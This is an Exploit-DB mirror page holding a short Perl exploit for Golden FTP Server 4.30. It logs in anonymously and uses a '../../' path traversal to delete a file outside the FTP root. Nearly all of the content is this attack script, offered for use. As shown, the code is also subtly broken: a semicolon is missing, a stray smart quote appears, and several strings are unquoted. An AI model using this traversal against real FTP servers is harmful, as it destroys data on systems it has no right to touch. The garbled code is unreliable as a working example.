exploit-db-mirror/exploits/windows/remote/10258.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
760 B
Perl
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]
#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/
use strict;
use Net::FTP
my $ftp = Net::FTP->new(192.168.1.35″, Debug => 1) || die $@;
$ftp->login(anonymous, anonymous@local.host) || die $ftp->message;
# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(/public/) || die $ftp->message;
# This deletes the file C:\bollocks.txt
$ftp->delete(../../bollocks.txt);
$ftp->quit;
$ftp = undef;